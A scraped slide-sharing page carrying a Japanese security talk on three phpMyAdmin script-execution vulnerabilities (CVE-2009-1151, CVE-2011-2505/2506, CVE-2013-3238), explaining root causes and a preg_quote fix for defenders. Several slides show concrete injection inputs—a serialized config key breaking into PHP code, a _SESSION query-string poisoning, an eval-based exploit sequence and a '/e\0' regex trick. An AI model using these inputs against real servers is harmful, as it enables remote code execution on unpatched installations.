Download free for 30 days
Sign in
Upload
Language (EN)
Support
Business
Mobile
Social Media
Marketing
Technology
Art & Photos
Career
Design
Education
Presentations & Public Speaking
Government & Nonprofit
Healthcare
Internet
Law
Leadership & Management
Automotive
Engineering
Software
Recruiting & HR
Retail
Sales
Services
Science
Small Business & Entrepreneurship
Food
Environment
Economy & Finance
Data & Analytics
Investor Relations
Sports
Spiritual
News & Politics
Travel
Self Improvement
Real Estate
Entertainment & Humor
Health & Medicine
Devices & Hardware
Lifestyle
Change Language
Language
English
Español
Português
Français
Deutsche
Cancel
Save
Submit search
EN
Uploaded by
Hiroshi Tokumaru
PDF, PPTX
10,419 views
phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
phpMyAdminのスクリプト実行可能な脆弱性を3種類集めました
Technology
◦
Read more
15
Save
Share
Embed
Embed presentation
Download
Download as PDF, PPTX
1
/ 30
2
/ 30
3
/ 30
4
/ 30
5
/ 30
6
/ 30
7
/ 30
8
/ 30
9
/ 30
10
/ 30
11
/ 30
12
/ 30
13
/ 30
14
/ 30
15
/ 30
16
/ 30
17
/ 30
18
/ 30
19
/ 30
20
/ 30
21
/ 30
22
/ 30
23
/ 30
24
/ 30
25
/ 30
26
/ 30
27
/ 30
28
/ 30
29
/ 30
30
/ 30
More Related Content
PDF
Active Directory 侵害と推奨対策
by
Yurika Kakiuchi
PPTX
An Introduction To REST API
by
Aniruddh Bhilvare
PDF
OAuth認証再考からのOpenID Connect #devlove
by
Nov Matake
PDF
Clean architecture
by
Alvaro García Loaisa
PPTX
DNS Security Presentation ISSA
by
Srikrupa Srivatsan
PDF
WebSocket / WebRTCの技術紹介
by
Yasuhiro Mawarimichi
PPT
Sql injection
by
Pallavi Biswas
PPTX
Sql injection
by
Zidh
Active Directory 侵害と推奨対策
by
Yurika Kakiuchi
An Introduction To REST API
by
Aniruddh Bhilvare
OAuth認証再考からのOpenID Connect #devlove
by
Nov Matake
Clean architecture
by
Alvaro García Loaisa
DNS Security Presentation ISSA
by
Srikrupa Srivatsan
WebSocket / WebRTCの技術紹介
by
Yasuhiro Mawarimichi
Sql injection
by
Pallavi Biswas
Sql injection
by
Zidh
What's hot
PDF
手把手教你 R 語言分析實務
by
Helen Afterglow
PPTX
Introduction to spring boot
by
Santosh Kumar Kar
PDF
Spring Social でソーシャルログインを実装する
by
Rakuten Group, Inc.
PPTX
Web App for Containers + MySQLでコンテナ対応したPHPアプリを作ろう!
by
Yoichi Kawasaki
PPTX
Understanding Cross-site Request Forgery
by
Daniel Miessler
PPTX
Introduction to REST - API
by
Chetan Gadodia
PPTX
本当は恐ろしい分散システムの話
by
Kumazaki Hiroki
PPTX
John the ripper & hydra password cracking tool
by
Md. Raquibul Hoque
PDF
Thick Application Penetration Testing: Crash Course
by
Scott Sutherland
PDF
Introduction to Web Application Penetration Testing
by
Netsparker
PPTX
java 8 new features
by
Rohit Verma
PDF
HTTP Request Smuggling via higher HTTP versions
by
neexemil
PPTX
Windows+VirtualBoxで作るTensorFlow環境
by
Hiroo Inamura
PDF
HTTP入門
by
Sota Sugiura
PDF
11st Legacy Application의 Spring Cloud 기반 MicroServices로 전환 개발 사례
by
YongSung Yoon
PDF
ReST (Representational State Transfer) Explained
by
Dhananjay Nene
PPTX
#MSDEVMTL Introduction à #SonarQube
by
Vincent Biret
PPT
Thick client application security assessment
by
Sanjay Kumar (Seeking options outside India)
PDF
今更聞けないOAuth2.0
by
Takahiro Sato
ODP
Asynchronous programming with Functional Java and comparison with Scala
by
Knoldus Inc.
手把手教你 R 語言分析實務
by
Helen Afterglow
Introduction to spring boot
by
Santosh Kumar Kar
Spring Social でソーシャルログインを実装する
by
Rakuten Group, Inc.
Web App for Containers + MySQLでコンテナ対応したPHPアプリを作ろう!
by
Yoichi Kawasaki
Understanding Cross-site Request Forgery
by
Daniel Miessler
Introduction to REST - API
by
Chetan Gadodia
本当は恐ろしい分散システムの話
by
Kumazaki Hiroki
John the ripper & hydra password cracking tool
by
Md. Raquibul Hoque
Thick Application Penetration Testing: Crash Course
by
Scott Sutherland
Introduction to Web Application Penetration Testing
by
Netsparker
java 8 new features
by
Rohit Verma
HTTP Request Smuggling via higher HTTP versions
by
neexemil
Windows+VirtualBoxで作るTensorFlow環境
by
Hiroo Inamura
HTTP入門
by
Sota Sugiura
11st Legacy Application의 Spring Cloud 기반 MicroServices로 전환 개발 사례
by
YongSung Yoon
ReST (Representational State Transfer) Explained
by
Dhananjay Nene
#MSDEVMTL Introduction à #SonarQube
by
Vincent Biret
Thick client application security assessment
by
Sanjay Kumar (Seeking options outside India)
今更聞けないOAuth2.0
by
Takahiro Sato
Asynchronous programming with Functional Java and comparison with Scala
by
Knoldus Inc.
Viewers also liked
PDF
文字コードに起因する脆弱性とその対策(増補版)
by
Hiroshi Tokumaru
PPTX
徳丸本に載っていないWebアプリケーションセキュリティ
by
Hiroshi Tokumaru
PPTX
脆弱性は誰のせい? PHP、MySQL、Joomla! の責任やいかに
by
Hiroshi Tokumaru
PPTX
文字コードの脆弱性はこの3年間でどの程度対策されたか?
by
Hiroshi Tokumaru
PPT
UnicodeによるXSSとSQLインジェクションの可能性
by
Hiroshi Tokumaru
PDF
徳丸本ができるまで
by
Hiroshi Tokumaru
PDF
今日こそわかる、安全なWebアプリの作り方2010
by
Hiroshi Tokumaru
PDF
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2011
by
Hiroshi Tokumaru
PDF
いまさら聞けないパスワードの取り扱い方
by
Hiroshi Tokumaru
PPTX
セキュアコーディング方法論再構築の試み
by
Hiroshi Tokumaru
PDF
文字コードに起因する脆弱性とその対策
by
Hiroshi Tokumaru
PDF
ここが変だよ、グローバルスタンダードの脆弱性対策~入力値の考え方~
by
Hiroshi Tokumaru
PDF
Rails SQL Injection Examplesの紹介
by
Hiroshi Tokumaru
PPTX
SecurityとValidationの奇妙な関係、あるいはDrupalはなぜValidationをしたがらないのか
by
Hiroshi Tokumaru
PDF
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
by
Hiroshi Tokumaru
PDF
ログイン前セッションフィクセイション攻撃の脅威と対策
by
Hiroshi Tokumaru
PDF
ガラケーで楽しむオレJSの勧め
by
Hiroshi Tokumaru
PDF
安全なPHPアプリケーションの作り方2013
by
Hiroshi Tokumaru
PDF
WAS Forum 2010カンファレンス:ケータイ2.0が開けてしまったパンドラの箱
by
Hiroshi Tokumaru
PPTX
PHPカンファレンス2009 - 45分で分かる安全なWebアプリケーション開発のための発注・要件・検収
by
Hiroshi Tokumaru
文字コードに起因する脆弱性とその対策(増補版)
by
Hiroshi Tokumaru
徳丸本に載っていないWebアプリケーションセキュリティ
by
Hiroshi Tokumaru
脆弱性は誰のせい? PHP、MySQL、Joomla! の責任やいかに
by
Hiroshi Tokumaru
文字コードの脆弱性はこの3年間でどの程度対策されたか?
by
Hiroshi Tokumaru
UnicodeによるXSSとSQLインジェクションの可能性
by
Hiroshi Tokumaru
徳丸本ができるまで
by
Hiroshi Tokumaru
今日こそわかる、安全なWebアプリの作り方2010
by
Hiroshi Tokumaru
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2011
by
Hiroshi Tokumaru
いまさら聞けないパスワードの取り扱い方
by
Hiroshi Tokumaru
セキュアコーディング方法論再構築の試み
by
Hiroshi Tokumaru
文字コードに起因する脆弱性とその対策
by
Hiroshi Tokumaru
ここが変だよ、グローバルスタンダードの脆弱性対策~入力値の考え方~
by
Hiroshi Tokumaru
Rails SQL Injection Examplesの紹介
by
Hiroshi Tokumaru
SecurityとValidationの奇妙な関係、あるいはDrupalはなぜValidationをしたがらないのか
by
Hiroshi Tokumaru
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
by
Hiroshi Tokumaru
ログイン前セッションフィクセイション攻撃の脅威と対策
by
Hiroshi Tokumaru
ガラケーで楽しむオレJSの勧め
by
Hiroshi Tokumaru
安全なPHPアプリケーションの作り方2013
by
Hiroshi Tokumaru
WAS Forum 2010カンファレンス:ケータイ2.0が開けてしまったパンドラの箱
by
Hiroshi Tokumaru
PHPカンファレンス2009 - 45分で分かる安全なWebアプリケーション開発のための発注・要件・検収
by
Hiroshi Tokumaru
Similar to phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
PPTX
Phpcon2015
by
Hiroshi Tokumaru
PPTX
『例えば、PHPを避ける』以降PHPはどれだけ安全になったか
by
Hiroshi Tokumaru
PPTX
ウェブセキュリティの常識
by
Hiroshi Tokumaru
PDF
PHP初心者セッション2023 〜ChatGPT時代の簡単な始め方〜
by
Hideo Kashioka
PPTX
安全なPHPアプリケーションの作り方2014
by
Hiroshi Tokumaru
PPTX
PHPCON_TOKYO_2022_Bigginer.pptx
by
Hideo Kashioka
PDF
PHPにないセキュリティ機能
by
Yasuo Ohgaki
PDF
スクリプト言語PHP攻略法
by
Rui Hirokawa
PDF
YAPC::Asia 2014 - 半端なPHPDisでPHPerに陰で笑われないためのPerl Monger向け最新PHP事情
by
Junichi Ishida
PDF
PHPの今とこれから2008
by
Rui Hirokawa
PDF
PHPでセキュリティを真面目に考える
by
Takuya Sato
PDF
PHPの今とこれから 2013
by
Rui Hirokawa
PDF
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
by
yoshinori matsumoto
ODP
第一回 社内勉強会 PHP Application Security Checklist に学ぶ PHP セキュリティ (Excerpt)
by
Yuya Takeyama
PPT
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
by
Hiromu Shioya
PDF
Phpcon tokyo 20120_bigginer
by
Hideo Kashioka
PDF
PHPの今とこれから2014
by
Rui Hirokawa
PDF
Modern PHP Programming @ PFI Seminar
by
Sotaro Karasawa
PPT
2009 PHP初心者
by
Hideo Kashioka
PPTX
Wordpress secure
by
Shinji Horiguchi
Phpcon2015
by
Hiroshi Tokumaru
『例えば、PHPを避ける』以降PHPはどれだけ安全になったか
by
Hiroshi Tokumaru
ウェブセキュリティの常識
by
Hiroshi Tokumaru
PHP初心者セッション2023 〜ChatGPT時代の簡単な始め方〜
by
Hideo Kashioka
安全なPHPアプリケーションの作り方2014
by
Hiroshi Tokumaru
PHPCON_TOKYO_2022_Bigginer.pptx
by
Hideo Kashioka
PHPにないセキュリティ機能
by
Yasuo Ohgaki
スクリプト言語PHP攻略法
by
Rui Hirokawa
YAPC::Asia 2014 - 半端なPHPDisでPHPerに陰で笑われないためのPerl Monger向け最新PHP事情
by
Junichi Ishida
PHPの今とこれから2008
by
Rui Hirokawa
PHPでセキュリティを真面目に考える
by
Takuya Sato
PHPの今とこれから 2013
by
Rui Hirokawa
これからHTML5を書く人のためのセキュリティ - HTML5など勉強会
by
yoshinori matsumoto
第一回 社内勉強会 PHP Application Security Checklist に学ぶ PHP セキュリティ (Excerpt)
by
Yuya Takeyama
20090218 第5回「PhpによるWebアプリケーションのセキュリティ入門」
by
Hiromu Shioya
Phpcon tokyo 20120_bigginer
by
Hideo Kashioka
PHPの今とこれから2014
by
Rui Hirokawa
Modern PHP Programming @ PFI Seminar
by
Sotaro Karasawa
2009 PHP初心者
by
Hideo Kashioka
Wordpress secure
by
Shinji Horiguchi
More from Hiroshi Tokumaru
PPTX
安全なPHPアプリケーションの作り方2016
by
Hiroshi Tokumaru
PPTX
SPAセキュリティ入門~PHP Conference Japan 2021
by
Hiroshi Tokumaru
PPTX
XXE、SSRF、安全でないデシリアライゼーション入門
by
Hiroshi Tokumaru
PPTX
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
by
Hiroshi Tokumaru
PPTX
安全なWebアプリケーションの作り方2018
by
Hiroshi Tokumaru
PPTX
Railsエンジニアのためのウェブセキュリティ入門
by
Hiroshi Tokumaru
PPTX
若手エンジニアのためのセキュリティ講座
by
Hiroshi Tokumaru
PDF
ウェブアプリケーションセキュリティ超入門
by
Hiroshi Tokumaru
PPT
SQLインジェクション再考
by
Hiroshi Tokumaru
PPTX
セキュリティの都市伝説を暴く
by
Hiroshi Tokumaru
PDF
著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則
by
Hiroshi Tokumaru
PPTX
ウェブセキュリティのありがちな誤解を解説する
by
Hiroshi Tokumaru
PPTX
ウェブ・セキュリティ基礎試験(徳丸基礎試験)の模擬試験問題
by
Hiroshi Tokumaru
PPTX
オニギリペイのセキュリティ事故に学ぶ安全なサービスの構築法 (PHPカンファレンス2019)
by
Hiroshi Tokumaru
PPTX
脅威分析の手法によりウェブサーバーにウイルス対策ソフトが必要かを検証する
by
Hiroshi Tokumaru
PPTX
徳丸本VMに脆弱なWordPressを導入する
by
Hiroshi Tokumaru
PPTX
秀スクリプトの話
by
Hiroshi Tokumaru
PPTX
ウェブセキュリティの最近の話題早分かり
by
Hiroshi Tokumaru
PPTX
introduction to unsafe deserialization part1
by
Hiroshi Tokumaru
PPTX
デバッガでWordPress本体やプラグインの脆弱性を追いかけてみよう
by
Hiroshi Tokumaru
安全なPHPアプリケーションの作り方2016
by
Hiroshi Tokumaru
SPAセキュリティ入門~PHP Conference Japan 2021
by
Hiroshi Tokumaru
XXE、SSRF、安全でないデシリアライゼーション入門
by
Hiroshi Tokumaru
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
by
Hiroshi Tokumaru
安全なWebアプリケーションの作り方2018
by
Hiroshi Tokumaru
Railsエンジニアのためのウェブセキュリティ入門
by
Hiroshi Tokumaru
若手エンジニアのためのセキュリティ講座
by
Hiroshi Tokumaru
ウェブアプリケーションセキュリティ超入門
by
Hiroshi Tokumaru
SQLインジェクション再考
by
Hiroshi Tokumaru
セキュリティの都市伝説を暴く
by
Hiroshi Tokumaru
著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則
by
Hiroshi Tokumaru
ウェブセキュリティのありがちな誤解を解説する
by
Hiroshi Tokumaru
ウェブ・セキュリティ基礎試験(徳丸基礎試験)の模擬試験問題
by
Hiroshi Tokumaru
オニギリペイのセキュリティ事故に学ぶ安全なサービスの構築法 (PHPカンファレンス2019)
by
Hiroshi Tokumaru
脅威分析の手法によりウェブサーバーにウイルス対策ソフトが必要かを検証する
by
Hiroshi Tokumaru
徳丸本VMに脆弱なWordPressを導入する
by
Hiroshi Tokumaru
秀スクリプトの話
by
Hiroshi Tokumaru
ウェブセキュリティの最近の話題早分かり
by
Hiroshi Tokumaru
introduction to unsafe deserialization part1
by
Hiroshi Tokumaru
デバッガでWordPress本体やプラグインの脆弱性を追いかけてみよう
by
Hiroshi Tokumaru
Recently uploaded
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):コアマイクロシステムズ株式会社 テーマ 「AI HPC時代のトータルソリューションプロバイダ」
by
PC Cluster Consortium
PPTX
ChatGPTのコネクタ開発から学ぶ、外部サービスをつなぐMCPサーバーの仕組み
by
Ryuji Egashira
PDF
論文紹介:DiffusionRet: Generative Text-Video Retrieval with Diffusion Model
by
Toru Tamaki
PDF
論文紹介:HiLoRA: Adaptive Hierarchical LoRA Routing for Training-Free Domain Gene...
by
Toru Tamaki
PDF
論文紹介:MotionMatcher: Cinematic Motion Customizationof Text-to-Video Diffusion ...
by
Toru Tamaki
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):日本ヒューレット・パッカード合同会社 テーマ1「大規模AIの能力を最大限に活用するHPE Comp...
by
PC Cluster Consortium
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):Pacific Teck Japan テーマ2「『Slinky』 SlurmとクラウドのKuber...
by
PC Cluster Consortium
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):Pacific Teck Japan テーマ3「『TrinityX』 AI時代のクラスターマネジメ...
by
PC Cluster Consortium
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):エヌビディア合同会社 テーマ1「NVIDIA 最新発表製品等のご案内」
by
PC Cluster Consortium
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):日本ヒューレット・パッカード合同会社 テーマ3「IT運用とデータサイエンティストを強力に支援するH...
by
PC Cluster Consortium
PDF
PCCC25(設立25年記念PCクラスタシンポジウム):富士通株式会社 テーマ1「HPC&AI: Accelerating material develo...
by
PC Cluster Consortium
PPTX
2025年11月24日情報ネットワーク法学会大井哲也発表「API利用のシステム情報」
by
Tetsuya Oi
PDF
AI開発の最前線を変えるニューラルネットワークプロセッサと、未来社会における応用可能性
by
Data Source
PDF
膨大なデータ時代を制する鍵、セグメンテーションAIが切り拓く解析精度と効率の革新
by
Data Source
PDF
ニューラルプロセッサによるAI処理の高速化と、未知の可能性を切り拓く未来の人工知能
by
Data Source
PCCC25(設立25年記念PCクラスタシンポジウム):コアマイクロシステムズ株式会社 テーマ 「AI HPC時代のトータルソリューションプロバイダ」
by
PC Cluster Consortium
ChatGPTのコネクタ開発から学ぶ、外部サービスをつなぐMCPサーバーの仕組み
by
Ryuji Egashira
論文紹介:DiffusionRet: Generative Text-Video Retrieval with Diffusion Model
by
Toru Tamaki
論文紹介:HiLoRA: Adaptive Hierarchical LoRA Routing for Training-Free Domain Gene...
by
Toru Tamaki
論文紹介:MotionMatcher: Cinematic Motion Customizationof Text-to-Video Diffusion ...
by
Toru Tamaki
PCCC25(設立25年記念PCクラスタシンポジウム):日本ヒューレット・パッカード合同会社 テーマ1「大規模AIの能力を最大限に活用するHPE Comp...
by
PC Cluster Consortium
PCCC25(設立25年記念PCクラスタシンポジウム):Pacific Teck Japan テーマ2「『Slinky』 SlurmとクラウドのKuber...
by
PC Cluster Consortium
PCCC25(設立25年記念PCクラスタシンポジウム):Pacific Teck Japan テーマ3「『TrinityX』 AI時代のクラスターマネジメ...
by
PC Cluster Consortium
PCCC25(設立25年記念PCクラスタシンポジウム):エヌビディア合同会社 テーマ1「NVIDIA 最新発表製品等のご案内」
by
PC Cluster Consortium
PCCC25(設立25年記念PCクラスタシンポジウム):日本ヒューレット・パッカード合同会社 テーマ3「IT運用とデータサイエンティストを強力に支援するH...
by
PC Cluster Consortium
PCCC25(設立25年記念PCクラスタシンポジウム):富士通株式会社 テーマ1「HPC&AI: Accelerating material develo...
by
PC Cluster Consortium
2025年11月24日情報ネットワーク法学会大井哲也発表「API利用のシステム情報」
by
Tetsuya Oi
AI開発の最前線を変えるニューラルネットワークプロセッサと、未来社会における応用可能性
by
Data Source
膨大なデータ時代を制する鍵、セグメンテーションAIが切り拓く解析精度と効率の革新
by
Data Source
ニューラルプロセッサによるAI処理の高速化と、未知の可能性を切り拓く未来の人工知能
by
Data Source
phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
1.
phpMyAdminにおける スクリプト実行可能な脆弱性3種盛り合わせ HASH コンサルティング株式会社 徳丸 浩
2.
アジェンダ • 今日はphpMyAdminにおける「スクリプト実行可能な脆 弱性」を3種類紹介します – CVE-2009-1151 –
CVE-2011-2505 / CVE-2011-2506 – CVE-2013-3238 • まとめ 2 Copyright © 2013 HASH Consulting Corp.
3.
はじめに • (サーバーサイド)スクリプト実行可能な脆弱性と いうと… • OSコマンドインジェクション •
evalインジェクション • Local File Inclusion (LFI) / Remote File Inclusion(RFI) • スクリプトファイルのアップロード • … • 今回紹介するものはどれでもない Copyright © 2013 HASH Consulting Corp. 3
4.
phpMyAdminとは… Copyright © 2013
HASH Consulting Corp. 4
5.
CVE-2009-1151 Copyright © 2013
HASH Consulting Corp. 5
6.
CVE-2009-1151 6http://jvndb.jvn.jp/ja/contents/2009/JVNDB-2009-001443.html
7.
セットアップ内容のセーブ Copyright © 2013
HASH Consulting Corp. 7
8.
configurationはシリアライズされたオブジェクト Copyright © 2013
HASH Consulting Corp. 8 configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"h ost";s:9:"localhost";s:9:"extension";s:5:"mysql";s:1 2:"connect_type";s:3:"tcp";s:8:"compress";b:0;s:9:" auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
9.
configurationからPHPソースが作られる Copyright © 2013
HASH Consulting Corp. 9 Array ( [Servers] => Array ( [0] => Array ( [host] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:9:"localhost ";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"comp ress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
10.
値に「’」を入れると、ちゃんとエスケープされる Copyright © 2013
HASH Consulting Corp. 10 Array ( [Servers] => Array ( [0] => Array ( [host] => localhost'a [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:11:"localho st'a";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"c ompress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'] = 'localhost¥'a'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
11.
でも、キー側の「’」はエスケープされない ^^; Copyright ©
2013 HASH Consulting Corp. 11 Array ( [Servers] => Array ( [0] => Array ( [host'a] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:6:"host'a";s:9:"localho st";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"co mpress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'a'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
12.
キーにスクリプトを注入可能 Copyright © 2013
HASH Consulting Corp. 12 Array ( [Servers] => Array ( [0] => Array ( [host'']=phpinfo();//] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:19:"host']=phpinfo();//";s:9: "localhost";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:" compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host’]=phpinfo();//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
13.
あーあ、サーバー側でスクリプトが… Copyright © 2013
HASH Consulting Corp. 13
14.
CVE-2011-2505 / CVE-2011-2506 Copyright
© 2013 HASH Consulting Corp. 14
15.
CVE-2011-2505 • 細工をしたクエリ文字列を通して、セッション変数 を変更できる Copyright ©
2013 HASH Consulting Corp. 15 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) { parse_str($_SERVER['QUERY_STRING']); session_write_close(); session_id($session_to_unset); // セッションIDの変更 session_start(); $_SESSION = array(); session_write_close(); session_destroy(); exit; } libraries/auth/swekey/swekey.auth.lib.php 266行目以降
16.
parse_str 関数 16 http://php.net/manual/ja/function.parse-str.php
17.
parse_str 関数の実行例 Copyright ©
2013 HASH Consulting Corp. 17 <?php session_start(); parse_str('a=xyz&b[x]=p23&_SESSION[user]=yamada'); var_dump($a); var_dump($b); var_dump($_SESSION); 【実行結果】 string(3) "xyz" array(1) { ["x"]=> string(3) "p23" } array(1) { ["user"]=> string(6) "yamada" }
18.
CVE-2011-2506 18http://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-004722.html
19.
• サーバー名(getServerName())は、コメント記号 をサニタイジングしている • $idの方はサニタイジングしていない
→ 脆弱性 • CVE-2011-2505により、$idに攻撃コードが注 入できる Copyright © 2013 HASH Consulting Corp. 19 // servers if ($cf->getServerCount() > 0) { $ret .= "/* Servers configuration */$crlf¥$i = 0;" . $crlf . $crlf; foreach ($c['Servers'] as $id => $server) { $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf setup/lib/ConfigGenerator.class.php 38行目
20.
exploitの流れ Copyright © 2013
HASH Consulting Corp. 20 セッションID、トークンの取得など GET /phpmyadmin/setup/index.php セッション変数汚染 GET /phpmyadmin/?_SESSION[ConfigFile][Servers][*/攻撃スクリプト 攻撃コードの埋め込み(ファイルへの保存) POST /phpmyadmin/setup/config.php 攻撃コードの実行 GET /phpmyadmin/config/config.inc.php?eval=攻撃コード
21.
CVE-2013-3238 Copyright © 2013
HASH Consulting Corp. 21
22.
CVE-2013-3238 22http://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-002490.html
23.
テーブルの接頭辞を変更する機能 Copyright © 2013
HASH Consulting Corp. 23
24.
/e¥0 をphpinfo()に変更する操作を実行してみる Copyright ©
2013 HASH Consulting Corp. 24
25.
Phpinfo()が実行された ^^; Copyright ©
2013 HASH Consulting Corp. 25
26.
攻撃ができる理由 Copyright © 2013
HASH Consulting Corp. 26 case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); preg_replace("/^/e¥0/", "phpinfo();", "test"); preg_replace("/^/e", "phpinfo();", "test"); $from_pref = "/e¥0" PHP5.4.3以前では、¥0以降は無視される
27.
/e 修飾子… 27 http://www.php.net/manual/ja/reference.pcre.pattern.modifiers.php
28.
/e 修飾子…続き 28 http://www.php.net/manual/ja/reference.pcre.pattern.modifiers.php
29.
脆弱性が混入した要因 • preg_replaceに渡す正規表現をエスケープして いなかった – 最低限、/
をエスケープする必要がある • えーっと、preg_quoteって、マルチバイト対応 だっけ? – Shift_JIS以外では問題ない? Copyright © 2013 HASH Consulting Corp. 29 preg_replace(“/^” . $from_prefix . “/”, … ↓ reg_replace("/^" . preg_quote($from_prefix, '/') . "/", …
30.
Copyright © 2013
HASH Consulting Corp. 30 まとめ • phpMyAdminのスクリプト実行可能な脆弱性3種 類を紹介しました • うち、2種類は比較的基本的なもの…脆弱性診 断でも見つかる? • Setup用のスクリプトが外部から叩けるという状 況がそもそもおかしい気が… – phpMyAdminが標準的な導入・運用のスタイルを提 供していない? • 脆弱性の入り方は酷いと思うけど、脆弱性って 大抵酷いものだよねw
Download